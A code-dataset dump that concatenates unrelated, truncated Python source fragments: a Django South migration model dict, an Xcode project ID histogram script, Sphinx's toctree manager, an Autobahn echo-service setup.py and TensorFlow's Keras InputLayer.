'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
| },
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'treemap.audit': {
'Meta': {'object_name': 'Audit'},
'action': ('django.db.models.fields.IntegerField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'current_value': ('django.db.models.fields.TextField', [], {'null': 'True', 'db_index': 'True'}),
'field': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.Instance']", 'null': 'True', 'blank': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'}),
'model_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}),
'previous_value': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'ref': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.Audit']", 'null': 'True'}),
'requires_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.User']"})
},
u'treemap.benefitcurrencyconversion': {
'Meta': {'object_name': 'BenefitCurrencyConversion'},
'co2_lb_to_currency': ('django.db.models.fields.FloatField', [], {}),
'currency_symbol': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'electricity_kwh_to_currency': ('django.db.models.fields.FloatField', [], {}),
'h20_gal_to_currency': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'natural_gas_kbtu_to_currency': ('django.db.models.fields.FloatField', [], {}),
'nox_lb_to_currency': ('django.db.models.fields.FloatField', [], {}),
'o3_lb_to_currency': ('django.db.models.fields.FloatField', [], {}),
'pm10_lb_to_currency': ('django.db.models.fields.FloatField', [], {}),
'sox_lb_to_currency': ('django.db.models.fields.FloatField', [], {}),
'voc_lb_to_currency': ('django.db.models.fields.FloatField', [], {})
},
u'treemap.boundary': {
'Meta': {'object_name': 'Boundary'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'geom': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'srid': '3857', 'db_column': "u'the_geom_webmercator'"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'sort_order': ('django.db.models.fields.IntegerField', [], {})
},
u'treemap.fieldpermission': {
'Meta': {'unique_together': "((u'model_name', u'field_name', u'role', u'instance'),)", 'object_name': 'FieldPermission'},
'field_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.Instance']"}),
'model_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'permission_level': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.Role']"})
},
u'treemap.instance': {
'Meta': {'object_name': 'Instance'},
'adjuncts_timestamp': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'basemap_data': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'basemap_type': ('django.db.models.fields.CharField', [], {'default': "u'google'", 'max_length': '255'}),
'boundaries': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['treemap.Boundary']", 'null': 'True', 'blank': 'True'}),
'bounds': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'srid': '3857'}),
'center_override': ('django.contrib.gis.db.models.fields.PointField', [], {'srid': '3857', 'null': 'True', 'blank': 'True'}),
'config': ('treemap.json_field.JSONField', [], {'blank': 'True'}),
'default_role': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'default_role'", 'to': u"orm['treemap.Role']"}),
'eco_benefits_conversion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['treemap.BenefitCurrencyConversion']", 'null': 'True', 'blank': 'True'}),
'geo_rev': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'itree_region_default': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'url_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['treemap.User |
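# The forwards() conversion from the migration above, shown as a standalone
# helper. This is a hedged sketch: 'model' stands for any Django model with
# nullable text columns, and the helper name and Species example are
# illustrative assumptions only.
def null_text_to_empty(model, fields):
    """Rewrite NULL values to '' so the columns can later be made NOT NULL."""
    for field in fields:
        model.objects.filter(**{field + '__isnull': True}) \
                     .update(**{field: ''})

# e.g. null_text_to_empty(Species, ('species', 'cultivar', 'gender'))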
mikr/xcodeprojer | examples/gidhistograms.py | Python | mit | 9,342 | 0.002141 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 Michael Krause ( http://krause-software.com/ ).
# You are free to use this code under the MIT license:
# http://opensource.org/licenses/MIT
"""Show some histograms for a directory a Xcode project files."""
from __future__ import print_function
import sys
import argparse
from os.path import abspath, dirname, join
import multiprocessing
from collections import defaultdict, Counter
import codecs
# Set up the Python path so we find the xcodeprojer module in the parent directory
# relative to this file.
sys.path.insert(1, dirname(dirname(abspath(__file__))))
import utils
import xcodeprojer
from xcodeprojer import bytestr, unistr
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
unichr = chr
try:
NARROW_BUILD = len(unichr(0x1f300)) == 2
except ValueError:
NARROW_BUILD = True
DEFAULT_FIRSTNAMES = 200
user_hash = xcodeprojer.UniqueXcodeIDGenerator.user_hash
emojis = []
def here():
return dirname(abspath(__file__))
def rel(filename):
return join(here(), filename)
def write(s, end='\n'):
s = unistr(s) + unistr(end)
s = s.encode('utf-8')
if PY2:
sys.stdout.write(s)
else:
sys.stdout.buffer.write(s)
def writeline():
write('\n')
def uniord(s):
"""ord that works on surrogate pairs.
"""
try:
return ord(s)
except TypeError:
pass
if len(s) != 2:
raise
return 0x10000 + ((ord(s[0]) - 0xd800) << 10) | (ord(s[1]) - 0xdc00)
def iterchars(text):
if not NARROW_BUILD:
for c in text:
yield c
idx = 0
while idx < len(text):
c = text[idx]
if ord(c) >= 0x100:
# When we are running on a narrow Python build
# we have to deal with surrogate pairs ourselves.
            if ((0xD800 <= ord(c) <= 0xDBFF)
                and (idx < len(text) - 1)
                and (0xDC00 <= ord(text[idx + 1]) <= 0xDFFF)):
c = text[idx:idx+2]
# Skip the other half of the lead and trail surrogate
idx += 1
idx += 1
yield c
def build_emoji_table():
with codecs.open(rel('emojis.txt'), 'r', encoding='utf-8') as f:
text = f.read()
uniques = set()
for c in iterchars(text):
# Only use unicode chars >= 0x100 (emoji etc.)
if len(c) >= 2 or ord(c) >= 0x100:
if c not in uniques:
emojis.append(c)
uniques.add(c)
def print_emoji_table():
per_line = 32
for i in range(len(emojis)):
if i % per_line == 0:
write("%3d" % i, end=' ')
write(emojis[i], end=' ')
if i % per_line == per_line - 1:
writeline()
writeline()
def print_emoji_histo(histo):
all_users = set()
for year, users in histo.items():
all_users.update(users)
all_users = sorted(all_users)
num_users = len(all_users)
for year, users in histo.items():
chars = [str(year), ' ']
for i in range(num_users):
if all_users[i] in users:
c = emojis[all_users[i]] + ' '
else:
c = ' '
chars.append(c)
write(''.join(chars))
write('\n')
def print_histo(histo, utcoffset=0):
maximum = max(histo.values())
max_display = 60
for k in sorted(histo):
if utcoffset != 0:
localhour = (k - utcoffset) % 24
else:
localhour = k
v = histo.get(localhour, 0)
stars = '*' * int(v * max_display / float(maximum))
write("%3d %5d %s" % (k, v, stars))
writeline()
def gidtable(filename):
with open(filename, 'rb') as f:
xcodeproj = f.read()
root, parseinfo = xcodeprojer.parse(xcodeproj)
if root is not None:
unparser = xcodeprojer.Unparser(root)
# We don't need the parse tree, only access to the gidcomments
# that are built during the unparse.
_ = unparser.unparse(root, projectname=xcodeprojer.projectname_for_path(filename))
gidcomments = unparser.gidcomments
c = '.'
else:
gidcomments = {}
c = 'X'
sys.stdout.write(c)
sys.stdout.flush()
return filename, gidcomments
def histogram(args, utcoffset=0):
if args.emoji or args.emojitable:
write("Please be patient when your computer is caching emoji fonts for you. This might take a minute.\n")
build_emoji_table()
if args.emojitable:
print_emoji_table()
return
path = args.directory
histo_year = Counter()
histo_hour = Counter()
users_per_year = defaultdict(set)
pool = multiprocessing.Pool(initializer=utils.per_process_init)
filenames = xcodeprojer.find_projectfiles(path)
results = []
write("Looking for Xcode ids in project files...")
sys.stdout.flush()
for idx, filename in enumerate(filenames):
results.append(pool.apply_async(gidtable, [filename]))
if args.max_files is not None and idx + 1 >= args.max_files:
break
pool.close()
try:
for asyncresult in results:
filename, gids = asyncresult.get()
for gid in gids:
fields = xcodeprojer.gidfields(gids, gid)
refdate = fields['date']
dt = xcodeprojer.datetime_from_utc(refdate)
histo_hour[dt.hour] += 1
year = dt.year
if args.startyear <= year <= args.endyear:
histo_year[year] += 1
users_per_year[year].add(fields['user'])
except (KeyboardInterrupt, GeneratorExit):
pool.terminate()
finally:
pool.join()
writeline()
write("At which hours are new Xcode ids created (UTC time offset: %d)" % args.utcoffset)
print_histo(histo_hour, utcoffset=utcoffset)
write("In which years were the Xcode ids created (we only look at %s-%s)" % (args.startyear, args.endyear))
print_histo(histo_year)
write("Estimated number of users creating new Xcode ids by year")
user_histo = {k: len(v) for (k, v) in users_per_year.items()}
print_histo(user_histo)
writeline()
write("The following is a list of names that might be completely unrelated to the examined Xcode projects.")
write("For something for tangible replace firstnames.txt with your own list.")
writeline()
max_firstnames_limited = print_names(args, users_per_year, emoji=args.emoji)
if args.emoji:
write("Looking for Xcode ids in project files...")
print_emoji_histo(users_per_year)
if max_firstnames_limited and args.max_firstnames is None:
write("The number of first names to | consider was limited to %d, this can be changed with --max-firstnames" % max_firstnames_limited)
def prin | t_names(args, users_per_year, emoji=False):
userhashes = defaultdict(list)
max_firstnames = args.max_firstnames
if max_firstnames is None:
max_firstnames = DEFAULT_FIRSTNAMES
max_firstnames_limited = None
with codecs.open(rel('firstnames.txt'), 'r', encoding='utf-8') as f:
firstnames = f.read().splitlines()
for idx, name in enumerate(firstnames):
if idx >= max_firstnames:
max_firstnames_limited = max_firstnames
break
userhashes[user_hash(name)].append(name)
for year, hashes in sorted(users_per_year.items()):
write(str(year), end=' ')
for h in sorted(hashes):
candidates = userhashes[h]
if candidates:
if emoji:
symbol = emojis[h] + ' '
else:
symbol = ''
write(' (%s' % symbol + ' | '.join(candidates) + ')', end=' ')
writeline()
return max_firstnames_limited
def main():
    parser = argparse.ArgumentParser(description='Show some histograms for a directory of Xcode project files.')
parser.add_argument('-u', '--utcoffset |
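# A small check of the surrogate-pair helpers defined above. The sample
# string is an illustrative assumption. On a narrow Python 2 build a non-BMP
# character such as U+1F300 occupies two UTF-16 code units; iterchars()
# re-joins the pair and uniord() recovers the code point, so the result
# matches a wide build.
s = u'\U0001F300x'                  # one non-BMP character plus one ASCII character
chars = list(iterchars(s))
assert len(chars) == 2              # the surrogate pair counts as a single character
assert uniord(chars[0]) == 0x1F300
assert uniord(chars[1]) == ord('x')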
bgris/ODL_bgris | lib/python3.5/site-packages/Sphinx-1.5.1-py3.5.egg/sphinx/environment/managers/toctree.py | Python | gpl-3.0 | 25,403 | 0.000512 | # -*- coding: utf-8 -*-
"""
sphinx.environment.managers.toctree
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Toctree manager for sphinx.environment.
:copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from six import iteritems
from docutils import nodes
from sphinx import addnodes
from sphinx.util import url_re
from sphinx.util.nodes import clean_astext, process_only_nodes
from sphinx.transforms import SphinxContentsFilter
from sphinx.environment.managers import EnvironmentManager
class Toctree(EnvironmentManager):
name = 'toctree'
def __init__(self, env):
super(Toctree, self).__init__(env)
self.tocs = env.tocs
self.toc_num_entries = env.toc_num_entries
self.toc_secnumbers = env.toc_secnumbers
self.toc_fignumbers = env.toc_fignumbers
self.toctree_includes = env.toctree_includes
self.files_to_rebuild = env.files_to_rebuild
self.glob_toctrees = env.glob_toctrees
self.numbered_toctrees = env.numbered_toctrees
def clear_doc(self, docname):
self.tocs.pop(docname, None)
self.toc_secnumbers.pop(docname, None)
self.toc_fignumbers.pop(docname, None)
self.toc_num_entries.pop(docname, None)
self.toctree_includes.pop(docname, None)
self.glob_toctrees.discard(docname)
self.numbered_toctrees.discard(docname)
for subfn, fnset in list(self.files_to_rebuild.items()):
fnset.discard(docname)
if not fnset:
del self.files_to_rebuild[subfn]
def merge_other(self, docnames, other):
for docname in docnames:
self.tocs[docname] = other.tocs[docname]
self.toc_num_entries[docname] = other.toc_num_entries[docname]
if docname in other.toctree_includes:
self.toctree_includes[docname] = other.toctree_includes[docname]
if docname in other.glob_toctrees:
self.glob_toctrees.add(docname)
if docname in other.numbered_toctrees:
self.numbered_toctrees.add(docname)
for subfn, fnset in other.files_to_rebuild.items():
self.files_to_rebuild.setdefault(subfn, set()).update(fnset & docnames)
def process_doc(self, docname, doctree):
"""Build a TOC from the doctree and store it in the inventory."""
numentries = [0] # nonlocal again...
def traverse_in_section(node, cls):
"""Like traverse(), but stay within the same section."""
result = []
if isinstance(node, cls):
result.append(node)
for child in node.children:
if isinstance(child, nodes.section):
continue
result.extend(traverse_in_section(child, cls))
return result
def build_toc(node, depth=1):
entries = []
for sectionnode in node:
# find all toctree nodes in this section and add them
# to the toc (just copying the toctree node which is then
# resolved in self.get_and_resolve_doctree)
if isinstance(sectionnode, addnodes.only):
onlynode = addnodes.only(expr=sectionnode['expr'])
blist = build_toc(sectionnode, depth)
if blist:
onlynode += blist.children
entries.append(onlynode)
continue
if not isinstance(sectionnode, nodes.section):
for toctreenode in traverse_in_section(sectionnode,
addnodes.toctree):
item = toctreenode.copy()
entries.append(item)
# important: do the inventory stuff
self.note_toctree(docname, toctreenode)
continue
title = sectionnode[0]
# copy the contents of the section title, but without references
# and unnecessary stuff
visitor = SphinxContentsFilter(doctree)
title.walkabout(visitor)
nodetext = visitor.get_entry_text()
if not numentries[0]:
# for the very first toc entry, don't add an anchor
# as it is the file's title anyway
anchorname = ''
else:
anchorname = '#' + sectionnode['ids'][0]
numentries[0] += 1
# make these nodes:
# list_item -> compact_paragraph -> reference
reference = nodes.reference(
'', '', internal=True, refuri=docname,
anchorname=anchorname, *nodetext)
para = addnodes.compact_paragraph('', '', reference)
item = nodes.list_item('', para)
sub_item = build_toc(sectionnode, depth + 1)
item += sub_item
entries.append(item)
if entries:
return nodes.bullet_list('', *entries)
return []
toc = build_toc(doctree)
if toc:
self.tocs[docname] = toc
else:
self.tocs[docname] = nodes.bullet_list('')
self.toc_num_entries[docname] = numentries[0]
def note_toctree(self, docname, toctreenode):
"""Note a TOC tree directive in a document and gather information about
file relations from it.
"""
if toctreenode['glob']:
self.glob_toctrees.add(docname)
if toctreenode.get('numbered'):
self.numbered_toctrees.add(docname)
includefiles = toctreenode['includefiles']
for includefile in includefiles:
# note that if the | included file is rebuilt, this one must be
# too (since the TOC of the included file could have changed)
self.files_to_rebuild.setdefault(includefile, set()).add(docname)
self.toctree_includes.setdefault(docname, []).extend(includefiles)
def get_toc_for(self, docname, builder):
"""Return a TOC nodetree -- for use on the same page only!"""
tocdepth = self.env.metadata[docname].get('tocdep | th', 0)
try:
toc = self.tocs[docname].deepcopy()
self._toctree_prune(toc, 2, tocdepth)
except KeyError:
# the document does not exist anymore: return a dummy node that
# renders to nothing
return nodes.paragraph()
process_only_nodes(toc, builder.tags, warn_node=self.env.warn_node)
for node in toc.traverse(nodes.reference):
node['refuri'] = node['anchorname'] or '#'
return toc
def get_toctree_for(self, docname, builder, collapse, **kwds):
"""Return the global TOC nodetree."""
doctree = self.env.get_doctree(self.env.config.master_doc)
toctrees = []
if 'includehidden' not in kwds:
kwds['includehidden'] = True
if 'maxdepth' not in kwds:
kwds['maxdepth'] = 0
kwds['collapse'] = collapse
for toctreenode in doctree.traverse(addnodes.toctree):
toctree = self.env.resolve_toctree(docname, builder, toctreenode,
prune=True, **kwds)
if toctree:
toctrees.append(toctree)
if not toctrees:
return None
result = toctrees[0]
for toctree in toctrees[1:]:
result.extend(toctree.children)
return result
def resolve_toctree(self, docname, builder, toctree, prune=True, maxdepth=0,
titles_only=False, collapse=False, includehidden=False):
"""Resolve a *toctree* node into individual bullet lists with titles
as items, returning None (if no containing titles are found) or
a new node.
If *prune* is True, the tree is pruned to *maxdepth*, or if that is 0,
to the value of the *maxdepth* option on the *toctree* node.
If *titles_only* is T |
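# A hedged sketch of the node shape build_toc() creates per section entry, as
# the inline comment above describes ("list_item -> compact_paragraph ->
# reference"). The docname, anchor and title are illustrative values.
from docutils import nodes
from sphinx import addnodes

nodetext = [nodes.Text('Section title')]
reference = nodes.reference('', '', internal=True, refuri='somedoc',
                            anchorname='#section-id', *nodetext)
para = addnodes.compact_paragraph('', '', reference)
item = nodes.list_item('', para)
toc = nodes.bullet_list('', item)   # one bullet_list per document in env.tocs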
meejah/AutobahnPython | examples/twisted/websocket/echo_service/setup.py | Python | mit | 1,892 | 0 | ###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyr | ight notice and this permission notice shall be | included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from setuptools import setup, find_packages
LONGDESC = """
A WebSocket echo service implemented as a Twisted service and
deployed as a twistd plugin.
"""
setup(
name='echows',
version='0.1.0',
description='Autobahn WebSocket Echo Service',
long_description=LONGDESC,
author='Tavendo GmbH',
url='http://crossbar.io/autobahn',
platforms=('Any'),
install_requires=['Twisted>=Twisted-12.2',
'Autobahn>=0.5.9'],
packages=find_packages() + ['twisted.plugins'],
# packages = ['echows', 'twisted.plugins'],
include_package_data=True,
zip_safe=False
)
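# The setup() above ships a twisted.plugins package so twistd can discover the
# service. A dropin file in that package typically looks like the sketch below;
# the module path 'echows.tap' and the tap name are assumptions about this
# project's layout, not confirmed by the original file.
from twisted.application.service import ServiceMaker

EchoWebSocket = ServiceMaker(
    "Autobahn WebSocket Echo",   # human-readable name
    "echows.tap",                # module providing Options and makeService
    "A WebSocket echo service",  # description shown in twistd's help output
    "echows")                    # subcommand name: twistd echows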
|
petewarden/tensorflow | tensorflow/python/keras/engine/input_layer.py | Python | apache-2.0 | 16,362 | 0.004462 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
"""Input layer code (`Input` and `InputLayer`).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import backend
from tensorflow.python.keras.distribute import distributed_training_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import keras_tensor
from tensorflow.python.keras.engine import node as node_module
from tensorflow.python.keras.saving.saved_model import layer_serialization
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.util.tf_export import keras_export
def _assert_other_arg_none(arg_name, arg):
if arg is not None:
raise ValueError('When `type_spec` is not None, all other args '
'except `name` must be None, '
'but %s is not None.' % arg_name)
@keras_export('keras.layers.InputLayer')
class InputLayer(base_layer.Layer):
"""Layer to be used as an entry point into a Network (a graph of layers).
It can either wrap an existing tensor (pass an `input_tensor` argument)
or create a placeholder tensor (pass arguments `input_shape`, and
optionally, `dtype`).
  It is generally recommended to use the functional layer API via `Input`,
(which creates an `InputLayer`) without directly using `InputLayer`.
When using InputLayer with Keras Sequential model, it can be skipped by
moving the input_shape parameter to the first layer after the InputLayer.
This class can create placeholders for tf.Tensors, tf.SparseTensors, and
tf.RaggedTensors by choosing 'sparse=True' or 'ragged=True'. Note that
  'sparse' and 'ragged' can't be configured to True at the same time.
Usage:
```python
# With explicit InputLayer.
model = tf.keras.Sequential([
tf.keras.layers.InputLayer(input_shape=(4,)),
tf.keras.layers.Dense(8)])
model.compile(tf.optimizers.RMSprop(0.001), loss='mse')
model.fit(np.zeros((10, 4)),
np.ones((10, 8)))
# Without InputLayer and let the first layer to have the input_shape.
# Keras will add a input for the model behind the scene.
model = tf.keras.Sequential([
tf.keras.layers.Dense(8, input_shape=(4,))])
model.compile(tf.optimizers.RMSprop(0.001), loss='mse')
model.fit(np.zeros((10, 4)),
np.ones((10, 8)))
```
Args:
input_shape: Shape tuple (not including the batch axis), or `TensorShape`
instance (not including the batch axis).
batch_size: Optional input batch size (integer or None).
dtype: Optional datatype of the input. When not provided, the Keras
default float type will be used.
input_tensor: Optional tensor to use as layer input. If set, the layer
will use the `tf.TypeSpec` of this tensor rather
than creating a new placeholder tensor.
sparse: Boolean, whether the placeholder created is meant to be sparse.
Default to False.
ragged: Boolean, whether the placeholder created is meant to be ragged.
In this case, values of 'None' in the 'shape' argument represent
ragged dimensions. For more information about RaggedTensors, see
[this guide](https://www.tensorflow.org/guide/ragged_tensors).
Default to False.
type_spec: A `tf.TypeSpec` object to create Input from. This `tf.TypeSpec`
represents the entire batch. When provided, all other args except
name must be None.
name: Optional name of the layer (string).
"""
def __init__(self,
input_shape=None,
batch_size=None,
dtype=None,
input_tensor=None,
sparse=None,
name=None,
ragged=None,
type_spec=None,
**kwargs):
self._init_input_shape = input_shape
self._init_batch_size = batch_size
self._init_dtype = dtype
self._init_sparse = sparse
self._init_ragged = ragged
self._init_type_spec = type_spec
strategy = distribution_strategy_context.get_strategy()
if strategy and batch_size is not None and \
distributed_training_utils.global_batch_size_supported(strategy):
if batch_size % strategy.num_replicas_in_sync != 0:
raise ValueError('The `batch_size` argument ({}) must be divisible by '
'the number of replicas ({})'.format(
batch_size, strategy.num_replicas_in_sync))
batch_size = batch_size // strategy.num_replicas_in_sync
if 'batch_input_shape' in kwargs:
batch_input_shape = kwargs.pop('batch_input_shape')
if input_shape and batch_input_shape:
raise ValueError('Only provide the input_shape OR '
'batch_input_shape argument to '
'InputLayer, not both at the same time.')
# Set the input shape and batch size from the batch_input_shape.
# Note that batch_input_shape can be None (unknown rank) or [] (scalar),
# in which case the batch size must be None.
if batch_input_shape:
batch_size = batch_input_shape[0]
input_shape = batch_input_shape[1:]
if kwargs:
raise ValueError('Unrecognized keyword arguments:', kwargs.keys())
if sparse and ragged:
raise ValueError(
'Cannot set both sparse and ragged to True in a Keras input.')
if not name:
prefix = 'input'
name = prefix + '_' + str(backend.get_uid(prefix))
if not dtype:
if input_tensor is None:
dtype = backend.floatx()
else:
dtype = backend.dtype(input_tensor)
elif input_tensor is not None and input_tensor.dtype != dtype:
raise ValueError('`input_tensor.dtype` differs from `dtype`: %s vs. %s' %
(input_tensor.dtype, dtype))
super(InputLayer, self).__init__(dtype=dtype, name=name)
self.built = True
self.sparse = True if sparse else False
self.ragged = True if ragged else False
self.batch_size = batch_size
self.supports_masking = True
if isinstance(input_shape, tensor_shape.TensorShape):
input_shape = tuple(input_shape.as_list())
elif isinstance(input_shape, int):
input_shape = (input_shape,)
if type_spec is not None:
args_that_must_be_none = [
('(input_)shape', self._init_input_shape),
('batch_size', self._init_batch_size),
('dtype', self._init_dtype),
('input_tensor', input_tensor),
('sparse', self._init_sparse),
('ragged', self._init_ragged),
]
for arg_name, arg in args_that_must_be_none:
_assert_other_arg_none(arg_name, arg)
if | not ops.executing_eagerly_outside_functions():
raise ValueError('Creating Keras inputs from a type_spec is only '
'supported when eager execution is enabled.')
input_tensor = keras_tensor.keras_tensor_from_type_spec(type_spec)
if isinstance(input_tensor, keras_tensor.SparseKerasTensor):
self.sparse = True
if isinstance(input_tensor, keras_tensor.RaggedKerasTensor):
| self.ragged = True
self.is_placeholder = True
try:
self._batch_input_shape = tuple(input_tensor.sha |
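# A hedged sketch of the placeholder variants the InputLayer docstring above
# describes (the row itself is truncated). Shapes are illustrative assumptions.
import tensorflow as tf

dense_in = tf.keras.Input(shape=(4,))                   # plain tf.Tensor placeholder
sparse_in = tf.keras.Input(shape=(4,), sparse=True)     # tf.SparseTensor placeholder
ragged_in = tf.keras.Input(shape=(None,), ragged=True)  # ragged dimension marked by None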